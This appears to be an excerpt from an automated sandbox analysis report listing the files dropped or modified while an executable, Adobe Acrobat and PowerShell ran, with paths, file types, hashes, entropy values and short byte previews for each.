                                                                                  MD5:286AD793985806DED1A75FBD51E6B617
                                                                                  SHA1:0ADA905869471389D2F47725E0E602B024BD3FC1
                                                                                  SHA-256:432123C9366CDA041219A951E67E03497E6D440E88BD87A1D68B771769484D02
                                                                                  SHA-512:F3ACA3D701251B4D08C072410F674CE0EF4E4EEA4D987B78148499B9D6E7A845FC28D753FEDBBE3A67BCF35197DCF7B5E93B2CCD7CABD3ADE6E7CC585BBE1BCC
                                                                                  Malicious:false
                                                                                  Preview:{"all":[{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"7fb341b5dc159e0f4eb714c8460188cf","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736844912000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"daab2cdffc8933105f9b680a01893db3","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736844912000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"dbe22c54ab01366ca97ba8c8a3c25fa3","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736844912000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"16c594e60da99325ef871d8cc1ae2356","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736844912000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"6b3100b957405fe3a1fda5da22d11d28","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1736844912000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"a8459e7d8f75007e8d9cb81b2a80323b","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                  Category:dropped
                                                                                  Size (bytes):12288
                                                                                  Entropy (8bit):1.1877636969069998
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:TGufl2GL7msEHUUUUUUUUTPkrSvR9H9vxFGiDIAEkGVvpvPkD:lNVmswUUUUUUUUTcr+FGSItTcD
                                                                                  MD5:04E5B32398888FF4F18581CD8CE9FEE6
                                                                                  SHA1:D57BA805F66907CE3405C73967C3E5BFFDF280B2
                                                                                  SHA-256:7820B88E83254BCE7608D9C3F6EBB1686E4308B83B1286174A60100D928082C2
                                                                                  SHA-512:594DABA5F4D85F2967B7FC4A22FF88E79B7AB20F07A514F997BCE1EE9B5B3E9507CEF22C4752CF92B49801A5A1CBC70FB2E22DC0327241CF648A790510ADD5C0
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:SQLite Rollback Journal
                                                                                  Category:dropped
                                                                                  Size (bytes):8720
                                                                                  Entropy (8bit):1.6057673456119703
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:7MAKUUUUUUUUUUTPk/vR9H9vxFGiDIAEkGVvxqFl2GL7ms6X:7UUUUUUUUUUUTc3FGSItvKVmsY
                                                                                  MD5:B9AD7F5FC93FFCB18FE3B1484997C7CC
                                                                                  SHA1:A606F725B5CA98A75D681E8CBF2DE6E8C539897B
                                                                                  SHA-256:A000FA71B1DF2C24DD1B6EEF57FDD9E058F23837A50DD45D10A34204B99944A2
                                                                                  SHA-512:137893F827D6E9050C543EF4CA81D132155E32BC8C1D7ACD3DE9E409B45E5FBC4F5EF1493FF8A76E52679BB87D94663A35555601771BFA24CAEF764B79655482
                                                                                  Malicious:false
                                                                                  Preview:.... .c......sO;......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):66726
                                                                                  Entropy (8bit):5.392739213842091
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:RNOpblrU6TBH44ADKZEgAVX63NsnmuZAV4GmheQCHp1TYyu:6a6TZ44ADEAVq3NsmucHvTK
                                                                                  MD5:8D1F27120A9DDC6387EB0EFA54A4D387
                                                                                  SHA1:5DF0A9DBCD2EC5F8C426557B0B25127DFC520279
                                                                                  SHA-256:6D46DFBDCC2EBCB76078D3ECFD65301A314A15A4198F97A1B59F5B7E84DAB77B
                                                                                  SHA-512:6C40C646546369BAF180AE1D14EB306E545DA957E9241F80F0F854C114E2E22B283B4DB650B96083733CA5D768E921D26E797C6CEC10BC219B21A04DB81BB53F
                                                                                  Malicious:false
                                                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):11608
                                                                                  Entropy (8bit):4.890472898059848
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdR2Ca6pZlbjvwRjdHPRhAgkjDt4iWN3yBGHVQ9sQ:9rib4ZoopbjvwRjdvRNkjh4iUxsT6YpR
                                                                                  MD5:6F4062C990C67D040ABC7B0F73689E66
                                                                                  SHA1:93421F047B440E9F62456C3E2EC1E6C842DA6A80
                                                                                  SHA-256:978EF65DE3DD792E7982FAAC8AC3C878936C94E2BCE7E17C56C604E5C68745F2
                                                                                  SHA-512:729AB7D57FB7D3405110D7F3C33F15057FE7DFB6DBDFFD5BD1D9F13C12C6448A70D0C39BC646F74B6A38E1708318CD4AE3D9DB1EF148815E80C30EB0122EEA57
                                                                                  Malicious:false
                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                  C:\Users\user\AppData\Local\Temp\MSI47832.LOG

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):246
                                                                                  Entropy (8bit):3.513199765407527
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K84sCl+MH:Qw946cPbiOxDlbYnuRKIhMH
                                                                                  MD5:B2E10D9093FEBCE7FE8FF98A8EF54CDF
                                                                                  SHA1:3AC71F3169861C05C099F1F3D427B6D1A8A9A44E
                                                                                  SHA-256:A96F7F1C5B5B045D730B516E80324726ED3D398AB614D283B6AF3B7F9FA9A7AC
                                                                                  SHA-512:EEAA9AD74392C5D29B70D8DFF049F694FC56CCC9584685A4B40AA9076BCF0294C150E9BFC03F8677873F1676D19F69AEF494BF07372CD9245DA3DC40AED20EEA
                                                                                  Malicious:false
                                                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.4./.0.1./.2.0.2.5. . .0.3.:.5.5.:.1.2. .=.=.=.....

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2la4axhh.c5n.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j42l5e2j.wmu.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_krsjusan.1cm.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_waz0j2vs.0ga.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\A91ov3ptm_hzt53n_428.tmp

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                                                                  Category:dropped
                                                                                  Size (bytes):144514
                                                                                  Entropy (8bit):7.992637131260696
                                                                                  Encrypted:true
                                                                                  SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                                                                  MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                                                                  SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                                                                  SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                                                                  SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                                                                  Malicious:false
                                                                                  Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

                                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-14 03-55-06-017.log

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:ASCII text, with very long lines (393)
                                                                                  Category:dropped
                                                                                  Size (bytes):16525
                                                                                  Entropy (8bit):5.345946398610936
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                                  MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                                  SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                                  SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                                  SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                                  Malicious:false
                                                                                  Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):29752
                                                                                  Entropy (8bit):5.3905870872052395
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rv:b
                                                                                  MD5:90518EF856B4999B0A81DDDA703ADABC
                                                                                  SHA1:D6288E70B472EB068B90DCF725C61FCA4331BFF1
                                                                                  SHA-256:4CB56AEA57F87388CCDC1B4E048FB75880CC022D196C9F8E88586F390369F4F6
                                                                                  SHA-512:816E61C25FD0B3C25CF91186A795D535EC0285DC8E610359626AACA1C42F236CAD46396264ACEC049E679083702CFA3AAC3DC74612BA985FB3B55C7B8AC841E7
                                                                                  Malicious:false
                                                                                  Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

                                                                                  C:\Users\user\AppData\Local\Temp\file.pdf

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\12.exe
                                                                                  File Type:PDF document, version 1.7
                                                                                  Category:dropped
                                                                                  Size (bytes):9
                                                                                  Entropy (8bit):3.169925001442312
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Imvn:IY
                                                                                  MD5:B491DE58BA84D5E12333A236ADD6DDB5
                                                                                  SHA1:EEBE4E01AA9B893BFFF8BF5A8CD9A0BA1D939D44
                                                                                  SHA-256:0716F9264C9FE19F5D7455276107F3DDCC1D3497F63D60689A73558AE8A1BF5E
                                                                                  SHA-512:BC3A2934AEF2582C7DBF748F46DCB6BE3A70F43B6DD335EFEDDA0AC12DB31B0A4C4E4EECF2798A9B4400A5EE5EDA9CFCD9AEA4285BD9703DF6D2498F3D4A477A
                                                                                  Malicious:false
                                                                                  Preview:%PDF-1.7.

                                                                                  C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):98682
                                                                                  Entropy (8bit):6.445287254681573
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
                                                                                  MD5:7113425405A05E110DC458BBF93F608A
                                                                                  SHA1:88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
                                                                                  SHA-256:7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
                                                                                  SHA-512:6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
                                                                                  Malicious:false
                                                                                  Preview:0...u0...\...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210

                                                                                  C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):737
                                                                                  Entropy (8bit):7.501268097735403
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
                                                                                  MD5:5274D23C3AB7C3D5A4F3F86D4249A545
                                                                                  SHA1:8A3778F5083169B281B610F2036E79AEA3020192
                                                                                  SHA-256:8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
                                                                                  SHA-512:FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
                                                                                  Malicious:false
                                                                                  Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R*.......~....)....i.*n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6221
                                                                                  Entropy (8bit):3.7294999767914985
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:pfli33CxH52kvhkvCCtWFlmqNHFFlmqeHZ:p9iyZiWFlJFlA
                                                                                  MD5:4734ED8BBDE5E5FA40881F359D765CF9
                                                                                  SHA1:D80D32AC96A5DE1EEB7ECEC20BDBD8CEF930D53A
                                                                                  SHA-256:BFBF130EC4318B7330C8D08C60D845EDAC89510EFBD26A76AD6FABEFEDA19901
                                                                                  SHA-512:F31372389C4984A8B2CDB3C375474A8CF962DA3A645996FB72423041D17463F2A7619B39736629EA36BB1BEEEEB7DA51A0FA7FE0EC147EBDE39F9302EE412EE8
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v...._...af......af......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Z.F...........................%..A.p.p.D.a.t.a...B.V.1......Z.F..Roaming.@......CW.^.Z.F..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Z.F..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AOELFIINM5P68NAN1QVS.temp

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6221
                                                                                  Entropy (8bit):3.7294999767914985
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:pfli33CxH52kvhkvCCtWFlmqNHFFlmqeHZ:p9iyZiWFlJFlA
                                                                                  MD5:4734ED8BBDE5E5FA40881F359D765CF9
                                                                                  SHA1:D80D32AC96A5DE1EEB7ECEC20BDBD8CEF930D53A
                                                                                  SHA-256:BFBF130EC4318B7330C8D08C60D845EDAC89510EFBD26A76AD6FABEFEDA19901
                                                                                  SHA-512:F31372389C4984A8B2CDB3C375474A8CF962DA3A645996FB72423041D17463F2A7619B39736629EA36BB1BEEEEB7DA51A0FA7FE0EC147EBDE39F9302EE412EE8
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v...._...af......af......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Z.F...........................%..A.p.p.D.a.t.a...B.V.1......Z.F..Roaming.@......CW.^.Z.F..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Z.F..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                  Download File
